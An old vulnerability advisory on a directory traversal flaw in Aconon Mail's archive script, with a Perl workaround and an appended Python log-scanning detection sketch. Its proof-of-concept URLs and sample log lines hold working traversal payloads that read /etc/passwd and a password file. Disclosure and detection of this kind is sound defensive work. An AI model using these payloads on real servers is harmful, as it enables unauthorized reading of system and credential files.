aconon-traverse.txt

24 Jan 2008 00:00:00 | Reported by Arno Toll | Type: packetstorm | Source: packetstormsecurity.com

Aconon Mail directory traversal vulnerability

`Application: aconon(R) Mail  
  
Affected versions: probably all known, tested against 2007 Enterprise  
SQL 11.7.0 and 2004 Enterprise SQL 11.5.1  
  
Affected platforms: every platform Aconon runs on (Win32, Linux, Solaris ...)  
  
Exploitation: remote  
  
Description: Aconon Mail is commercial newsletter software that provides  
a feature-rich web interface for both users and administrators. This  
includes a publicly available archive of sent newsletters. The archived  
e-mails can be accessed through a web browser and are rendered by a template  
engine. Any user can override the template used by modifying the  
HTTP GET "template" form parameter. This parameter is checked for  
code injection, but not for directory traversal.  
  
Proof of Concept:  
  
http://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=data/password.pl&link=%3C%3C%3C%3C  
http://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=../../../../../../etc/passwd&link=%3C%3C%3C%3C  
  
Fix:  
  
No fix has been published yet. However this workaround should patch the  
issue:  
  
Add in archiv.cgi below  
$FORM{'template'} =~ s/\|//g;  
  
this code:  
  
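use File::Basename;  
# Keep only the file name component, dropping any directory part.  
$FORM{'template'} = ($FORM{'template'}) ? basename($FORM{'template'}) : "";  
# Reject any template whose name does not end in .html.  
if ($FORM{'template'} && $FORM{'template'} !~ /\.html$/) {  
    &error ("$TXT{'1501'}");  
}  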
  
Status: the vendor has been informed.  
  
  
German readers of the list may also read  
http://burnachurch.com/67/directory-traversal-luecke-in-aconon-mail/  
  
P.S. greets to missi - you're great :o)  
  
`
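
A detection sketch for the issue described above, added here and not part of the original advisory: it scans web server access logs for archiv.cgi requests whose "template" parameter is not a bare .html file name. The common/combined log format, the /mail/ path and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line of a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def template_verdict(template):
    """Return why a template value is suspicious, or None if acceptable.

    A legitimate value is expected to be a bare file name ending in .html."""
    for _ in range(3):                  # undo nested percent-encoding, bounded
        template = unquote(template)
    if template == "":
        return None                     # no template override requested
    if "/" in template or "\\" in template:
        return "path separator"
    if not template.endswith(".html"):
        return "not an .html template"
    return None

def scan(lines):
    """Return (line_no, template, reason) for each suspicious archiv.cgi request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/archiv.cgi"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        for template in params.get("template", []):
            reason = template_verdict(template)
            if reason:
                hits.append((n, template, reason))
    return hits

# Constructed sample entries; the /mail/ path and the addresses are assumptions.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Jan/2008:10:00:00 +0100] "GET /mail/archiv.cgi?list=news&file=a.save&template=archiv.html HTTP/1.1" 200 5120',
    '192.0.2.11 - - [24/Jan/2008:10:01:00 +0100] "GET /mail/archiv.cgi?list=&file=a.save&template=../../../../../../etc/passwd HTTP/1.1" 200 1834',
    '192.0.2.11 - - [24/Jan/2008:10:01:05 +0100] "GET /mail/archiv.cgi?list=&file=a.save&template=data/password.pl HTTP/1.1" 200 211',
    '192.0.2.12 - - [24/Jan/2008:10:02:00 +0100] "GET /index.html HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for line_no, template, reason in scan(SAMPLE_LOG):
        print(f"line {line_no}: template={template!r} ({reason})")
```

The check is stricter than the workaround, which strips directory components before testing the extension; for log review, any path separator in the parameter is worth flagging.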
